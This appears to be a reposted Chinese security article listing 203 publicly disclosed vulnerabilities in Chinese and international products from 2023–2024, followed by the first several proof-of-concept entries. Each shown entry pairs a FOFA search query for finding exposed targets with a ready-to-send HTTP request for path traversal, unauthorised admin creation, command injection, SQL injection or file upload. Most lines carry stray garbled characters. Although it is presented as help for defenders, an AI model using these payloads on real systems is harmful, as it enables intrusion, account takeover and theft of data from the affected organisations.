互联网公开漏洞整理202309-202406! a% \5 m( X: K. l/ A
道一安全 2024-06-05 07:41 北京0 Q/ w1 r8 p& d! Q9 O" U8 _, Y
以下文章来源于网络安全新视界 ,作者网络安全新视界! \4 M2 L8 n4 s0 s9 U
G- x. z! s! v" o+ w发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
% [# A) `. \# M& M. x0 n
/ j* K. P1 |! j* ^2 c漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
0 f. h3 M/ K" @, _% K
$ ?: M1 ]1 D, v( Q2 j) c' E, A+ D安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
5 Q+ O6 q! D1 ]& p
& l. f, ~1 D2 l1 _7 Q6 v文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。. V2 Q& F- X- ^8 ~3 q& Z
7 b6 H/ F6 o& ]' {0 S
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。5 m8 V' l. G+ X' J4 j! g }" n8 S
" }2 M6 S) L* ^/ f8 T' F1 R. J
$ c# V7 P2 B3 x+ z" G- L声明8 [3 r$ I$ g( N* R6 {
8 }+ D) H1 ^; L9 f. G; e3 ^9 N, W为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。. Y1 Y7 r3 X# S! Y+ z H: \0 J
: [9 V: v ~, G- F- Y有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
. B& t4 j8 }3 N) c
9 B* [. d" p9 C: \: N; a2 R* G# o2 M* a) c
6 }$ M0 L4 v4 [ h: F: o9 ^
目录
( N4 b- o/ ?) \& t/ O! n% ~- E0 Z% R2 S
$ k9 r3 s v G0 U01( W: m2 ~$ M2 O: h3 o$ a8 ~/ o# A; J- d
" c8 g4 e$ i! g; ?1 G1. StarRocks MPP数据库未授权访问6 u* j- ]( ^7 }2 c* A0 `, o
2. Casdoor系统static任意文件读取
) C8 b' t# D2 |5 t2 a3. EasyCVR智能边缘网关 userlist 信息泄漏
2 l ~/ }; S) K! A0 ~+ d- M: p4. EasyCVR视频管理平台存在任意用户添加) N4 V8 }6 f9 u" i4 M* P2 x( ]
5. NUUO NVR 视频存储管理设备远程命令执行
, u; L7 Y2 o7 N. J, H# m6. 深信服 NGAF 任意文件读取
$ [7 p- M! p0 c7 Y; i7. 鸿运主动安全监控云平台任意文件下载
& c6 `% m1 P& \$ `+ B i8. 斐讯 Phicomm 路由器RCE
/ i5 h, X8 s9 \9. 稻壳CMS keyword 未授权SQL注入4 a! A: P4 M$ Y3 ^1 i9 \. e0 n
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
) O' J* m4 e* ~! m% P11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入9 b- M- H5 A1 w! I' c
12. Jorani < 1.0.2 远程命令执行
% l* \$ X8 L' t( r13. 红帆iOffice ioFileDown任意文件读取1 | ^0 G- _, D' q, W# n) e* N# U
14. 华夏ERP(jshERP)敏感信息泄露
3 \% S& M- z d6 p7 l15. 华夏ERP getAllList信息泄露( Q, i" T9 b) q& F9 R
16. 红帆HFOffice医微云SQL注入' g% U) `2 `2 B# b: Q5 l
17. 大华 DSS itcBulletin SQL 注入
, x {! G! R9 ?) F18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
3 y) @: U. a3 {& C19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入; c1 g+ N% A( k' y
20. 大华ICC智能物联综合管理平台任意文件读取
6 w0 J( k2 b* E( G# M8 r21. 大华ICC智能物联综合管理平台random远程代码执行
; l! P: Z1 P1 w$ e6 t0 q1 K22. 大华ICC智能物联综合管理平台 log4j远程代码执行% q( Y+ q* A3 J: y
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
) C9 y4 W0 q7 v! u% O7 R$ t: E24. 用友NC 6.5 accept.jsp任意文件上传
|0 G3 l6 H" a: i25. 用友NC registerServlet JNDI 远程代码执行
- \6 p6 U/ b& |: |$ h" _, O26. 用友NC linkVoucher SQL注入
: ` Y, L5 P4 R" g; b* u27. 用友 NC showcontent SQL注入
2 C% z& j: ~' d* ]28. 用友NC grouptemplet 任意文件上传
$ K' \; e- ~4 l: ?5 R+ K29. 用友NC down/bill SQL注入- o& B9 V7 Q- M* L% H
30. 用友NC importPml SQL注入* u: o0 q* ]$ ]! r; Y) Z
31. 用友NC runStateServlet SQL注入# t1 x" w$ U! O1 O+ X
32. 用友NC complainbilldetail SQL注入. [5 l& O/ `8 m( u
33. 用友NC downTax/download SQL注入
6 Y- [4 S9 A5 R k- }4 _34. 用友NC warningDetailInfo接口SQL注入
( p- e2 |. n* J% [/ N4 e35. 用友NC-Cloud importhttpscer任意文件上传
4 P& {9 m- U( k" o8 u36. 用友NC-Cloud soapFormat XXE2 R6 g& u: W& L; n/ O0 M2 |3 N
37. 用友NC-Cloud IUpdateService XXE( m' G" P, a' f4 x C
38. 用友U8 Cloud smartweb2.RPC.d XXE
# }9 c( s! ]: q% F39. 用友U8 Cloud RegisterServlet SQL注入
5 Q6 ^2 [* F; r' N$ Q40. 用友U8-Cloud XChangeServlet XXE
/ J4 A, W) W m0 v+ I1 L, i5 |41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
* p; v8 b0 A/ | C$ a4 `42. 用友GRP-U8 SmartUpload01 文件上传
3 `( r3 C u( [7 s" V/ x/ n; B: [43. 用友GRP-U8 userInfoWeb SQL注入致RCE7 r! Z) }/ r# S3 Z. K
44. 用友GRP-U8 bx_dj_check.jsp SQL注入- q0 j# f7 K3 D$ g% U
45. 用友GRP-U8 ufgovbank XXE! p4 B( ~6 e9 \1 j4 P
46. 用友GRP-U8 sqcxIndex.jsp SQL注入# w3 T: d( u* } {# o4 M; m L
47. 用友GRP A++Cloud 政府财务云 任意文件读取/ H2 J6 T _* v/ R L% ~8 p
48. 用友U8 CRM swfupload 任意文件上传; e# b0 t9 s) _$ J. _% W$ L; \4 [
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
0 Z( F+ ^" K" k2 Q& O ^50. QDocs Smart School 6.4.1 filterRecords SQL注入2 Z+ u! A* O5 F" {9 _. V( ^
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入8 E' G* @4 R% z# `) m
52. 泛微E-Office json_common.php sql注入
5 i' n! U0 s" |) s! y/ ]' F53. 迪普 DPTech VPN Service 任意文件上传
, N3 @0 d6 W- [" W; [54. 畅捷通T+ getstorewarehousebystore 远程代码执行
3 E( t# e! U2 @! M1 d55. 畅捷通T+ getdecallusers信息泄露0 v. z/ _' s7 @% e- }4 R
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
1 [; J) s( @1 k+ w57. 畅捷通T+ keyEdit.aspx SQL注入: g, H- v2 U3 {$ M) ?% u
58. 畅捷通T+ KeyInfoList.aspx sql注入$ h) v9 f v) }5 y, k" O5 Z
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
" f( W* j% A4 f6 i0 u60. 百卓Smart管理平台 importexport.php SQL注入1 b" d+ o+ t" g; X7 [7 x4 ]$ P
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
5 x8 c0 K5 Q8 U8 {( J0 m& P62. IP-guard WebServer 远程命令执行. q6 X: I$ u4 n+ C) w" q8 Q
63. IP-guard WebServer任意文件读取/ q+ u4 P, ^' r6 U1 C0 K/ i2 M. ^
64. 捷诚管理信息系统CWSFinanceCommon SQL注入; ~8 J5 P. ^6 Y. K, j
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过8 t D& r( ? P( R! i
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入0 _+ S5 C- |0 n9 J, m% u A: G% M, P
67. 万户ezOFFICE wpsservlet任意文件上传+ K- g C5 n2 n9 q2 R
68. 万户ezOFFICE wf_printnum.jsp SQL注入. r/ w2 m) D* } h; w' z4 m" \% F
69. 万户 ezOFFICE contract_gd.jsp SQL注入
& ^4 d4 h( N6 [5 t6 |& p& L70. 万户ezEIP success 命令执行
: [1 p7 }1 | E1 n" s71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入2 t4 {: D% M. B" s$ {) n
72. 致远OA getAjaxDataServlet XXE
1 V! r5 B7 `! A: C7 k/ w) k73. GeoServer wms远程代码执行
5 [ x k8 P2 }+ Y74. 致远M3-server 6_1sp1 反序列化RCE# E% S# F9 j+ ]2 U
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
) h p6 I$ s" V2 O76. 新开普掌上校园服务管理平台service.action远程命令执行$ f& C, y! \5 I1 h' G7 x
77. F22服装管理软件系统UploadHandler.ashx任意文件上传( ^% I/ ?3 ?% e" p/ U) }
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
) o! p( U1 V& o8 I1 x9 @79. BYTEVALUE 百为流控路由器远程命令执行
/ e6 A; d/ F3 P) `) Q$ K4 a s2 V80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
6 u: E0 i% U( r: h& E81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
; q& K5 j; b; H! J4 ~# Z! m82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
M& M* [4 K) q+ p8 _83. JeecgBoot testConnection 远程命令执行0 t) G2 \$ Y. x
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
$ H3 R8 n) W# |3 _, `6 D0 V$ ?85. SysAid On-premise< 23.3.36远程代码执行
: W$ ~$ B9 ^8 P* a- ^6 r86. 日本tosei自助洗衣机RCE* x2 |5 ?( Z8 I0 q
87. 安恒明御安全网关aaa_local_web_preview文件上传' d, U/ X" q, d* h4 P
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
, n8 N( ?( m$ V, l0 a( f89. 致远互联FE协作办公平台editflow_manager存在sql注入
! R9 u0 w+ a3 G90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
! B; a; t* B/ z% F. Y91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取9 X* e5 K) A8 }" }
92. 海康威视运行管理中心session命令执行
" [* k3 M2 E2 @- }: s2 a% N93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传( j$ [: |7 ` u6 [9 r( w
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
- ]; y8 `9 v9 C95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行/ i) M- K0 t% ~/ g
96. Apache OFBiz 18.12.11 groovy 远程代码执行
# a8 Q: X% w4 K. b i& b97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行 K6 N) j" Q( n, j) o% c
98. SpiderFlow爬虫平台远程命令执行) L2 u% o% Q ]$ b( l8 U
99. Ncast盈可视高清智能录播系统busiFacade RCE" A9 a5 v, O& r: D# r( E1 X* K, v
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
7 _+ N$ R3 D3 i7 \2 O101. ivanti policy secure-22.6命令注入/ P# ^- ~% b$ i/ Z2 t
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
5 H* Y0 s; _& q4 s103. Ivanti Pulse Connect Secure VPN XXE
1 p; L, ?9 W8 D1 K104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
0 B1 G5 e/ T, c105. SpringBlade v3.2.0 export-user SQL 注入
( c1 s8 u% E. J# f8 I106. SpringBlade dict-biz/list SQL 注入
& h w" F$ w4 u: ^* {) M107. SpringBlade tenant/list SQL 注入7 K, V! z5 q5 y+ G2 C, ~) b& g
108. D-Tale 3.9.0 SSRF2 O' R/ H5 E- P+ N
109. Jenkins CLI 任意文件读取
B0 ` ]" h8 A/ ~110. Goanywhere MFT 未授权创建管理员
, r4 Y+ \) L, ?+ G) {3 B111. WordPress Plugin HTML5 Video Player SQL注入
. `. I1 E% w" H$ u% K" f3 t' N+ E112. WordPress Plugin NotificationX SQL 注入
, E. x/ C" x1 `0 R9 d# K, m113. WordPress Automatic 插件任意文件下载和SSRF. I5 K) O# _8 y, m! X( N
114. WordPress MasterStudy LMS插件 SQL注入/ c2 C9 ]0 d, T) x* y7 A: L
115. WordPress Bricks Builder <= 1.9.6 RCE( v5 Q" G L) d7 n, o; k
116. wordpress js-support-ticket文件上传
7 m9 _! `- H4 [; }117. WordPress LayerSlider插件SQL注入, z' I+ S2 i- P2 Q, U
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
+ L1 T$ i5 L7 W1 R) ^# e119. 北京百绰智能S20后台sysmanageajax.php sql注入
1 f2 r# b% o% U% d7 e120. 北京百绰智能S40管理平台导入web.php任意文件上传8 l$ ~" l: U$ V9 R, ~
121. 北京百绰智能S42管理平台userattestation.php任意文件上传5 ]- I: T; x! s' G( W
122. 北京百绰智能s200管理平台/importexport.php sql注入9 v+ C# C! T8 z1 x4 v
123. Atlassian Confluence 模板注入代码执行
4 x5 N$ y m3 e: \+ g2 X( o. p124. 湖南建研工程质量检测系统任意文件上传
6 a* h4 D% Q. {+ p- z125. ConnectWise ScreenConnect身份验证绕过8 R+ z5 c" C1 y" I/ ^ Y
126. Aiohttp 路径遍历& r% W+ P* K: V
127. 广联达Linkworks DataExchange.ashx XXE
( j9 V! r2 X y* i2 F9 C4 L128. Adobe ColdFusion 反序列化' b$ `9 P% g1 F- k
129. Adobe ColdFusion 任意文件读取' u+ o7 V1 Z: ~$ H& m/ B& a) `
130. Laykefu客服系统任意文件上传
) M+ a$ o' _/ x9 S% |( Z$ [131. Mini-Tmall <=20231017 SQL注入
- w0 B- { W) A% v! o132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
: y& Y3 N* X1 q# |% @8 H8 i1 M133. H5 云商城 file.php 文件上传
0 Y5 E# w6 M. t; M6 r134. 网康NS-ASG应用安全网关index.php sql注入2 o" s4 m2 C$ R) X
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
' _% |% Y q9 H. F7 i1 Z$ a136. NextChat cors SSRF
- E0 N4 K& B8 _! f8 R. n137. 福建科立迅通信指挥调度平台down_file.php sql注入
( O) P+ q) n) ^/ W9 g; }4 ]0 A138. 福建科立讯通信指挥调度平台pwd_update.php sql注入: c4 L4 k) m* M" O( H5 ^8 V7 A
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
, D& u5 O9 f# W7 `: `% \1 H140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入* l$ h0 [$ C: e; ]& l
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
3 l# }7 ^9 i# t4 x) \; f) n6 L6 V% z142. CMSV6车辆监控平台系统中存在弱密码
9 j* U9 s8 J: }/ q: z+ m& ^143. Netis WF2780 v2.1.40144 远程命令执行
5 z6 ]2 w6 |8 l% q144. D-Link nas_sharing.cgi 命令注入3 A9 {. {! f* T$ n) D
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
9 @4 \; |" X7 c9 B8 M146. MajorDoMo thumb.php 未授权远程代码执行
1 b3 v+ M9 e$ {3 C147. RaidenMAILD邮件服务器v.4.9.4-路径遍历* j6 c6 S: ?& g* Z! Z
148. CrushFTP 认证绕过模板注入
! p5 a8 {* R3 H" ]149. AJ-Report开源数据大屏存在远程命令执行
! k0 P, h. V% o150. AJ-Report 1.4.0 认证绕过与远程代码执行6 `& @. }. Q- f1 E( H" O% b/ N
151. AJ-Report 1.4.1 pageList sql注入
( j" g4 s" J9 n152. Progress Kemp LoadMaster 远程命令执行 }2 |7 K T5 P# s3 j1 F5 G
153. gradio任意文件读取
9 v3 `% {# Y/ r$ W" s0 Q, w154. 天维尔消防救援作战调度平台 SQL注入
5 @/ _, t5 m: k0 `; \155. 六零导航页 file.php 任意文件上传; B L# R. S0 ]& l
156. TBK DVR-4104/DVR-4216 操作系统命令注入
0 K: Z" p* s0 D$ z/ o. i2 h157. 美特CRM upload.jsp 任意文件上传1 o+ D7 z6 n5 x3 ^# l
158. Mura-CMS-processAsyncObject存在SQL注入- D; s( N- J" E
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传1 F( q! ~7 k, I. x) @, Y
160. Sonatype Nexus Repository 3目录遍历与文件读取
( }& p9 d0 L' O C7 B$ B161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传% Y4 K2 \8 \& k) \! t: z
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传& ?$ q% w( ]+ S' c
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传) J2 I. v4 j5 D8 u+ a+ A [
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
1 L/ i. C- w3 X) j* v8 o8 b165. OrangeHRM 3.3.3 SQL 注入
+ Q+ y: {% e/ [8 z5 |166. 中成科信票务管理平台SeatMapHandler SQL注入
5 A+ p* Y0 n# {) W167. 精益价值管理系统 DownLoad.aspx任意文件读取
0 b" \3 x3 }2 m0 m168. 宏景EHR OutputCode 任意文件读取+ A7 F3 f. B4 Z; A
169. 宏景EHR downlawbase SQL注入
& z) ?: [6 ?% ^& E170. 宏景EHR DisplayExcelCustomReport 任意文件读取
% X; z2 c! ] I- H171. 通天星CMSV6车载定位监控平台 SQL注入) j" n! P0 N" F: Q* r2 a
172. DT-高清车牌识别摄像机任意文件读取% ]3 N+ e# A4 g4 E N. [# {
173. Check Point 安全网关任意文件读取
4 P# O! v6 e$ |9 T" P; l" S# q* O174. 金和OA C6 FileDownLoad.aspx 任意文件读取0 s) ^) [. G6 ^+ A4 `
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
! g* s5 e/ p' V7 g) r, [8 @2 b176. 电信网关配置管理系统 rewrite.php 文件上传( n$ ~9 v; X0 ?! \3 ]1 q- G
177. H3C路由器敏感信息泄露& I" \4 Y- F& {8 N/ P+ a5 C
178. H3C校园网自助服务系统-flexfileupload-任意文件上传& T& a' x9 h# W# F! P4 y" K" K
179. 建文工程管理系统存在任意文件读取- f9 d/ J' @2 Y$ }
180. 帮管客 CRM jiliyu SQL注入
) S; @7 f& K& O# G$ D/ K1 V181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入$ l4 U4 k# H3 M) {" z4 C8 Z* r
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
! }2 l, Y% [. K$ `: q7 K. C6 ~183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入. A7 q# A. a; ]0 |: D ]5 R
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
0 }0 i2 j. t% R. d: G! l185. 瑞友天翼应用虚拟化系统SQL注入0 M$ o6 T% d; f4 J
186. F-logic DataCube3 SQL注入. v4 W3 m$ L- f
187. Mura CMS processAsyncObject SQL注入
: A. z( I; {/ H" f z. Q9 F188. 叁体-佳会视频会议 attachment 任意文件读取" `9 l0 V5 x: ^9 @# J7 p
189. 蓝网科技临床浏览系统 deleteStudy SQL注入- P# S- z/ [% z( ^$ H- S4 m
190. 短视频矩阵营销系统 poihuoqu 任意文件读取) i4 c7 i+ h, Q3 ^! C
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入& T; j! b7 @$ s! G, ?( e" \2 [
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传8 J' }- t( z& ^4 O
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
9 Q/ U( g2 I# d- A! F194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传- E# N& X1 ]7 ^6 R3 h$ o+ b1 ~
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行2 |3 F/ H9 X8 o I& B' ~
196. 河南省风速科技统一认证平台密码重置
- p9 f9 ], q. W7 D( v197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
1 X3 r1 f; `% h( c* ?- o! [4 a198. 阿里云盘 WebDAV 命令注入
2 U. Q5 U: Z' j% {199. cockpit系统assetsmanager_upload接口 文件上传' T, ^* \* n D! v2 `
200. SeaCMS海洋影视管理系统dmku SQL注入8 {- J. z7 _$ i, h2 g
201. 方正全媒体新闻采编系统 binary SQL注入
9 W. N8 n8 f$ D/ r' m, a' E" I- ?202. 微擎系统 AccountEdit任意文件上传+ G6 N! H' H- Y' u2 q! h+ @
203. 红海云EHR PtFjk 文件上传
. ]0 u5 m: K Y
3 N p/ X9 T/ qPOC列表
3 J( V5 ]2 K$ R, A. G# b( P
" ^: {- ?: y: ?8 M$ \: n; a027 h! H }" K: \/ f; @7 g
+ }4 b, d& Q. x1. StarRocks MPP数据库未授权访问0 Q% w p) O% ]& N# q( G- r
FOFA :title="StarRocks"' V6 N9 |" j" J% [9 C
GET /mem_tracker HTTP/1.14 M3 G' _; U9 a9 _6 f
Host: URL
. a2 y0 O( g ^& U3 G
: j* q% m& m0 C1 ~+ |9 l$ S9 b. X! W
2. Casdoor系统static任意文件读取* q+ g# v' t% ?% a4 Y5 D1 Y
FOFA :title="Casdoor"
5 k7 J4 }! F) ^0 W6 d& C& ZGET /static/../../../../../../../../../../../etc/passwd HTTP/1.1; M6 L% [% w( i: n- Q
Host: xx.xx.xx.xx:9999
7 u8 v$ L% C c7 [User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36; d4 K4 Z T _5 O3 H
Connection: close( \) V+ r9 x+ ?" a) J$ S# c* a, I
Accept: */*. H6 g. e# g& X" w+ k
Accept-Language: en
0 N5 w& }! B+ \; e) g1 a9 @Accept-Encoding: gzip
" c9 i3 X' Q' `$ j4 C: X
: T* t! {/ `4 l9 y
0 H1 S* v' N1 t* |9 Q6 l3. EasyCVR智能边缘网关 userlist 信息泄漏
# A% {8 M! S$ ?8 i& P, VFOFA :title="EasyCVR"
& u& j3 K3 }5 x5 `' L6 w+ BGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
$ n2 ?) a r7 E7 K% Y; OHost: xx.xx.xx.xx
0 y/ t- ~* U& a; |$ N0 p) ^& r% ?7 B- |+ {7 X
, J6 ?, _7 _5 O
4. EasyCVR视频管理平台存在任意用户添加
$ M8 Q) Z( t% E, F) DFOFA :title="EasyCVR"
% `8 [/ N: e# o! {2 Y6 B* c/ i& n9 e: N3 ^; U8 e
password更改为自己的密码md5
; O# i$ ]. z# g' T) vPOST /api/v1/adduser HTTP/1.1; H! J9 E) [ b0 y3 T( ?1 ]
Host: your-ip
* a m: J9 j3 } e* U# iContent-Type: application/x-www-form-urlencoded; charset=UTF-84 Q* \4 ?- n* Y1 [. j5 ]+ N: B
# b+ a8 ?' n9 U$ B6 c* e. b) Nname=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1% {5 }5 e/ [! e- c
+ c( U3 m( g2 t; Q4 s" c( L
; \, l- x- v1 P/ a3 `5. NUUO NVR 视频存储管理设备远程命令执行
2 m( f) N K6 e3 ~% X, [FOFA:title="Network Video Recorder Login"
F L0 [: v2 M( P7 Y c% eGET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
" [9 S+ r3 S4 t/ Y; G# Y) C; [; u, sHost: xx.xx.xx.xx
5 c/ V- n' q6 k" g5 g( L2 `" i$ i" w+ F+ e; v& Z& Q
3 |& {, ]% \( } U, p" H* Y. U* F' s
6. 深信服 NGAF 任意文件读取( [7 d3 F8 N! f/ E( ?
FOFA:title="SANGFOR | NGAF"( H5 A5 ]' V. X$ g4 R' r
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
% a2 M4 x# l C6 C' i/ wHost:- K5 U; I6 k) d$ T
9 b6 j8 g$ u! V }9 i0 a; k
+ [+ l" q U* e ?( G$ o1 M. i+ b7. 鸿运主动安全监控云平台任意文件下载
/ S q9 W' J, @* C% [5 e7 BFOFA:body="./open/webApi.html"
" k2 t6 G) g9 |" SGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
( h$ B! _4 b2 z) XHost:+ q& g& y# D# L# V
# R' p& E$ e9 H" I5 e
4 o1 B6 d3 l8 z7 J# r/ B$ n+ {
8. 斐讯 Phicomm 路由器RCE5 a& s* J [2 l3 l
FOFA:icon_hash="-1344736688"
) {3 G3 A: G* w9 N+ d+ }) F1 p6 `默认账号admin登录后台后,执行操作* l( C7 J4 {1 v" d. l* D; r: M$ j
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
& b- b# b' Q( l0 v$ g* ZHost: x.x.x.x$ T* V w- O L% y I
Cookie: sysauth=第一步登录获取的cookie
0 T9 k2 P2 ^* v& @+ ~, KContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz5 S. W' h6 B3 Z6 B
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
; p; T) j- s$ b+ A6 s/ R3 `) m; l: U1 e) C
------WebKitFormBoundaryxbgjoytz
4 u% [- q! M9 |Content-Disposition: form-data; name="wifiRebootEnablestatus"/ J+ Y1 z/ Z5 _) `( E, O* u
& I: ]) z- O8 b# e; k; j
%s: @5 V x/ y) {0 p" [1 D
------WebKitFormBoundaryxbgjoytz& g' g. g6 ^0 d- [- j7 A! Z' o
Content-Disposition: form-data; name="wifiRebootrange", h& F$ v5 h; s _* k6 J
. f/ l! T0 w. I" \* z0 b* P12:00; id;1 _/ L2 q5 |. c$ a. T
------WebKitFormBoundaryxbgjoytz
( `' h Z3 I2 C. HContent-Disposition: form-data; name="wifiRebootendrange"
6 a' i. C% m8 \+ N7 W' N4 m
& g7 v6 f( J* v) Y# }%s:
; _" b$ P6 k0 P9 W& U------WebKitFormBoundaryxbgjoytz8 r# U* c0 z& U
Content-Disposition: form-data; name="cururl2"
+ ?# v# ~" h: L7 h! M c1 Q8 a8 y3 M3 o) l' @, X
7 y: \: d+ o5 w& N7 E
------WebKitFormBoundaryxbgjoytz--0 n3 X0 V5 S4 k. b9 q
$ Y' @+ ~ N8 ]1 q% V
0 ^/ X2 Z4 F+ X8 ~% G0 g9 P9. 稻壳CMS keyword 未授权SQL注入+ H% s7 S. i4 ]8 f' j
FOFA:app="Doccms"" `- [1 F- @6 S8 v% m/ w9 {
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
4 v& v# v. g9 M+ M3 M" lHost: x.x.x.x# a7 _% i8 f% z( t, G% P
. `7 F8 l- f1 w1 m
1 m, e" b& K+ e3 t! d2 Mpayload为下列语句的二次Url编码7 [ m% g" P( g' t C+ {0 L
1 ~+ U' {6 r( K) B' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
' ^% Z! _' P/ Q! f$ J8 d7 r- Z4 V, Y9 }5 Q% D6 R
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
3 c7 a5 n8 M- DFOFA:icon_hash="953405444"% C: p6 p: D. ~; A! C1 c
" n F& |1 e+ ~' P# \文件上传后响应中包含上传文件的路径
5 `! l2 I$ W2 J. m3 DPOST /eis/service/api.aspx?action=saveImg HTTP/1.1. @! [$ T5 N* F9 O* J
Host: x.x.x.x:xx
# g: {, ?2 B- w% l1 L \3 F3 dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
" H1 y N9 j, x( C* W3 S- X' NContent-Length: 197
# W: U. A7 d) }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
) L% [3 ]" q9 f6 `Accept-Encoding: gzip, deflate' R& f% U$ ~4 m4 H+ O
Accept-Language: zh-CN,zh;q=0.9, P6 U! t2 g e/ M/ `. d9 ^
Connection: close% h$ G0 l# T* [" E
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
& G/ F4 O$ S4 w5 V
0 Y% J# O4 Z: @6 `. X1 f* B5 u0 z" N------WebKitFormBoundaryxdgaqmqu1 L6 N! W* N9 U+ G) o
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
% g1 A- F7 ]3 B5 b' n9 yContent-Type: text/html
7 s4 A6 ~8 F0 f" V0 R
& e5 R6 N: k7 ~+ _jmnqjfdsupxgfidopeixbgsxbf) @# v5 j& T$ N" U7 X
------WebKitFormBoundaryxdgaqmqu--
% K+ \( V: y: \# `* t
6 P( t# I* z5 r6 q- [
9 g+ m& L7 i6 ?11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
1 f6 e6 Z l t! @& gFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
& w' A; _; K7 Y$ f1 u9 aGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
